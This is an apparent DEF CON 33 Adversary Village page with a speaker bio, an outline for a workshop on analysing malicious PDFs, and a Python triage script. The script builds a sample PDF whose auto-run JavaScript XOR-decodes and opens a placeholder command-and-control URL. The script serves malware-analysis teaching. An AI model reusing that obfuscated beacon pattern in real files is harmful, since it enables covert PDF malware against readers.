Adversary Village at DEF CON 33

Filipi Pires

Head of Identity Threat Labs and Global Product Advocate

I’ve been working as Head of Identity Threat Labs and Global Product Advocate at Segura®, Red Team Village Director, Senior Advisor at Raices Cyber Academy, Founder of the Red Team Community (Brazil and LATAM), AWS Community Builder, Snyk Ambassador, Application Security Specialist and Hacking is NOT a Crime Advocate. I am an international speaker at security and new-technology events in many countries, including the US (Black Hat & DEF CON), Canada, France, Spain, Germany, Poland and Black Hat MEA (Middle East), among others. I’ve served as a university professor in graduation and MBA courses at Brazilian colleges. In addition, I’m the creator and instructor of the courses Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers (PentestMagazine) and Malware Analysis - Fundamentals (HackerSec).

Hands-on workshop: Malware Attack in PDFs: An Adversary Real Attack Analysis

Friday | Aug 8th 2025
Adversary Village workshop stage | Las Vegas Convention Center

Adversary Tradecraft

This workshop takes a close look at the structure of PDF files, analysing each segment in turn. It shows how threat actors embed malicious components in the file structure, and it walks through the collection of IOCs (Indicators of Compromise) and the construction of IOAs (Indicators of Attack) for behavioural analysis, so that defenders can anticipate and stop new attack vectors.
The technical part covers the anatomy of a PDF file: header, body, cross-reference table and trailer. Live demonstrations dissect malicious PDFs with tools such as pdfid, pdf-parser and pdftk, giving hands-on insight into the analysis process. The session explains the encoding techniques used and how threat actors establish Command and Control (C&C) channels from within PDF files. It closes with a Q&A, leaving participants with practical knowledge for malware analysis and proactive defence.

Detailed workshop outline

  • 1. What is Malware Analysis?
    • Malware: Software meant to harm, steal, or take control.
    • Analysis: Figuring out what the malware does and how it works.
    • Types of Analysis
      • Static analysis: Looking at the file without running it (inspect structure, code).
      • Dynamic analysis: Running it in a safe, controlled way to observe its behavior.
  • 2. How PDF Malware Works
    • PDF is a document format, but can hold code like JavaScript.
    • Attackers hide malware in parts of PDF or with code inside files.
  • 3. Inside a PDF File
    • Header: Says it’s a PDF.
    • Body: Holds pages, images, or scripts.
    • Cross-reference table (xref): Lists where things are in the file.
    • Trailer: Marks the end of the file.
  • 4. How Attackers Hide Malware in PDFs
    • Use JavaScript: Code that runs when opening the PDF.
    • Use links (URIs): To redirect to a bad website.
    • Obfuscation: Making code hard to read (using encoding, hex, Unicode tricks).
  • 5. How to Analyze a Malicious PDF (Simple Demo/Process)
    • Use pdfid to quickly check for dangerous parts (like JavaScript, URLs).
    • Use pdf-parser to look closer at suspicious parts or code.
    • Look for:
      • Embedded JavaScript
      • Unusual links/URIs
      • Encoded or strange-looking text
  • 6. Spotting Command & Control (C2)
    • Attackers may hide, inside the PDF, the address of the server the malware connects to.
    • Sometimes info is hidden with simple tricks, like XOR encoding.
  • 7. Demo Example Steps
    • Run pdfid to scan PDF.
    • If JavaScript is found, extract it with pdf-parser.
    • Check JS for weird code or links.
    • Try to decode any jumbled or encoded text.
  • 8. Key Takeaways
    • PDF can be dangerous, not just a document.
    • Tools like pdfid and pdf-parser help spot and understand malware in PDFs.
    • Look for JavaScript, strange links, and encoded data in suspicious PDFs.
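As an added example (not part of the workshop materials), the following Python script reproduces the triage steps of the outline against a constructed sample PDF: pdfid-style keyword counts over the raw bytes, extraction of an inline `/JS` literal string from a JavaScript action object, and a brute-force of all 256 single-byte XOR keys over a hex blob found in that script. The sample PDF, its JavaScript and the placeholder host `c2.example.invalid` are constructed here and are not real indicators. The extractor handles only literal-string `/JS` values; payloads stored in streams (`/JS 5 0 R`) or behind filters still need pdf-parser, as the outline says.

```python
import re

# pdfid-style keyword list: presence is not proof of malice, but each of
# these names widens the attack surface and justifies a closer look.
RISKY_KEYWORDS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
                  b"/URI", b"/EmbeddedFile", b"/RichMedia", b"/ObjStm"]

# --- constructed sample: not a real malicious file, not a real IoC ----------
C2_PLACEHOLDER = b"http://c2.example.invalid/beacon"  # RFC 2606 reserved TLD
XOR_KEY = 0x5A
ENCODED_HEX = bytes(b ^ XOR_KEY for b in C2_PLACEHOLDER).hex()

# JavaScript that rebuilds the host at runtime with the single-byte XOR trick
# the outline mentions; written without backslashes so it survives unchanged
# as a PDF literal string.
SAMPLE_JS = (
    "var h='" + ENCODED_HEX + "';var s='';"
    "for(var i=0;i<h.length;i+=2){"
    "s+=String.fromCharCode(parseInt(h.substr(i,2),16)^90);}"
    "app.launchURL(s);"
)

# Header, body (catalog -> /OpenAction -> JavaScript action), xref, trailer.
# The xref offsets are placeholders: like pdfid, this triage scans raw bytes
# and never consults the cross-reference table.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    + b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    + b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    + b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    + b"4 0 obj << /S /JavaScript /JS (" + SAMPLE_JS.encode() + b") >> endobj\n"
    + b"xref\n0 1\n0000000000 65535 f \n"
    + b"trailer << /Size 5 /Root 1 0 R >>\nstartxref\n0\n%%EOF\n"
)


def keyword_counts(pdf: bytes) -> dict:
    """Step 1 (pdfid): count risky name tokens in the raw file bytes.
    A name token ends at whitespace or a delimiter, so /URI is not counted
    inside /URIs. Hex-escaped names such as /J#53 are out of scope here."""
    counts = {}
    for kw in RISKY_KEYWORDS:
        pattern = re.escape(kw) + rb"(?![A-Za-z0-9_])"
        counts[kw.decode()] = len(re.findall(pattern, pdf))
    return counts


def _read_literal_string(buf: bytes, start: int) -> bytes:
    """Read the PDF literal string whose '(' sits at buf[start]. PDF allows
    balanced unescaped parentheses inside, so nesting depth is tracked;
    a backslash takes the next byte literally."""
    depth, i, out = 0, start, bytearray()
    while i < len(buf):
        c = buf[i:i + 1]
        if c == b"\\":
            out += buf[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth == 1:
                i += 1
                continue
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
        out += c
        i += 1
    return bytes(out)


def extract_js(pdf: bytes) -> list:
    """Step 2 (pdf-parser territory): pull inline /JS (...) payloads."""
    return [_read_literal_string(pdf, m.end() - 1).decode("latin-1")
            for m in re.finditer(rb"/JS\s*\(", pdf)]


def xor_candidates(hexblob: str, marker: bytes = b"http") -> list:
    """Step 4: try every single-byte XOR key and keep the decodings that are
    fully printable ASCII and contain `marker`. Returns (key, text) pairs."""
    data = bytes.fromhex(hexblob)
    hits = []
    for key in range(256):
        plain = bytes(b ^ key for b in data)
        if all(32 <= b < 127 for b in plain) and marker in plain:
            hits.append((key, plain.decode("ascii")))
    return hits


def triage(pdf: bytes) -> dict:
    """Run the whole outline: keyword scan, JS extraction, decode hex blobs."""
    report = {"keywords": keyword_counts(pdf), "javascript": extract_js(pdf),
              "decoded": []}
    for js in report["javascript"]:
        for blob in re.findall(r"['\"]([0-9a-fA-F]{16,})['\"]", js):
            if len(blob) % 2 == 0:
                report["decoded"].extend(xor_candidates(blob))
    return report


if __name__ == "__main__":
    for section, value in triage(SAMPLE_PDF).items():
        print(section, "->", value)
```

Running the script prints a count of 1 for `/JavaScript`, `/JS` and `/OpenAction`, the extracted script, and the single XOR key (0x5A) that turns the hex blob back into the placeholder URL. The printable-ASCII filter is what keeps the 256-key brute force from flooding the analyst with noise; for real samples, extend `RISKY_KEYWORDS` and the hex-blob regex to whatever encoding the pdf-parser output shows.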

Panel discussion: Adversarial mindset and offensive cyber security, importance of security communities

Friday | Aug 8th 2025
Adversary Village workshop stage | Las Vegas Convention Center

Adversary Village Panel
Adversarial mindset

This panel brings together offensive cyber security experts and community leaders to explore the critical role of the adversarial mindset in modern cyber security. From red teaming and threat emulation to vulnerability research, we'll discuss how thinking like an attacker strengthens defense strategies.
We will also highlight the power of grassroots security communities in sharing knowledge, advancing tradecraft, and building the next generation of defenders. Join us for a conversation that bridges offense, defense, and the culture that makes it all possible.
